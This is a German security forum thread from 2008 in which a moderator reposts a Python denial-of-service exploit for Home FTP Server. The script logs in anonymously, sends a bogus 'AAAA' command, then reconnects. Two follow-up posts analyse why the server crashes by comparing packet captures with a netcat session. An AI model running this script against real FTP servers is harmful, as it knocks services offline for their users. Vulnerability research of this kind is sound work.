:: Loginclub Board  

Zurück   :: Loginclub Board > :: Netzwelt · Scene & News > Vulnerability- & Exploit- News
Benutzername
Kennwort
Registrieren Hilfe Benutzerliste Kalender Suchen Heutige Beiträge Alle Foren als gelesen markieren

Antwort

Themen-Optionen Thema durchsuchen Ansicht
Alt 18.03.2008, 17:25   #1
DrWhiteLetter
Super Moderator

Benutzerbild von DrWhiteLetter

Registrierungsdatum: 04.2003
Standard HOME FTP SERVER DoS Exploit

Für den Home FTP Server gibts einen relativ lustigen DoS-Exploit, bisher weiß wohl noch keiner so genau, warum der Server dabei abschmiert (es kommt gleich von mir noch etwas mehr dazu).

Hier der Exploit:
Code:
# Discovered by 0in from DaRk-CodeRs Programming & Security Group # Contact: 0in(dot)email[at]gmail(dot)com # Thats a very funny bug, and nobody understand how it works;] # When we send a python FTP retrlines() function bad command and create # a new connection server got DoS... o0 # Thats not overflow, it's probubly in logic application. # Greetings to all DaRk-CodeRs Members: # Die_Angel, Sun8hclf, M4r1usz, Djlinux, Aristo89 # Special THX to: Rade0n3900 # Debug: # ---------------------- # | EIP: 0100FE98 | # | DS:[00FFFFED4]=??? | # | ECX: 0100FED4 | # ---------------------- from ftplib import FTP import time ip="127.0.0.1" login="anonymous" passwd = 'gorion@scriptkiddie.pl' print '-------------------------------' print '| HOME FTP SERVER DoS Exploit |' print '| bY 0in From Dark-Coders! |' print '|>>http://dark-coders.4rh.eu<<|' print '-------------------------------' print 'connecting...' ftp=FTP(ip) ftp.login(login,passwd) print 'sending...' try: ftp.retrlines("AAAA") except Exception: print 'ok!\nreconnecting...' ftp=FTP(ip) ftp.quit() print 'DosEd' #EoFF # milw0rm.com [2008-03-17]
DrWhiteLetter ist offline   Mit Zitat antworten  
Alt 18.03.2008, 17:56   #2
DrWhiteLetter
Super Moderator

Standard

Ich habe mir das gerade auch gleich einmal etwas näher angeschaut. Im Prinzip macht der obige Code nichts anderes als einen Befehl ("AAAA") an den FTP-Server zu schicken den es aber nicht gibt.

Unten im Screenshot findet ihr im rot umrahmten Kästchen den Teil, den ich bei dem Python-Exploit mit gesnifft habe. Darunter hab ich das Gleiche mit einer NetCat-Verbindung simuliert. Beim Python-Exploit liefert der FTP-Server jedoch bei der Übergabe von "AAAA" nach der Fehlermeldung noch ein "ok" (grün unterstrichen), wärend dies bei meiner NetCat Variante nicht der Fall ist.

Lediglich der Vergleich der Binär- und Hexwerte beider Befehlsübertragungen zeigt einen Unterschied, somit muss das Python-FTP-Modul hier wohl einen Fehler bei der Ascii-Übertragung machen, mit dem der Server nicht zurecht kommt.
Angehängte Grafiken
Dateityp: png python.png (98,9 KB, 24x aufgerufen)
Alt 18.03.2008, 18:07   #3
DrWhiteLetter
Super Moderator

Standard

Hier im Anhang nochmal der Vergleich. Oben seht ihr den Teil von Python und unten die Übertragung via Netcat.
Angehängte Grafiken
Dateityp: png vergleich.png (37,1 KB, 34x aufgerufen)
Antwort

Themen-Optionen Thema durchsuchen
Thema durchsuchen:

Erweiterte Suche
Ansicht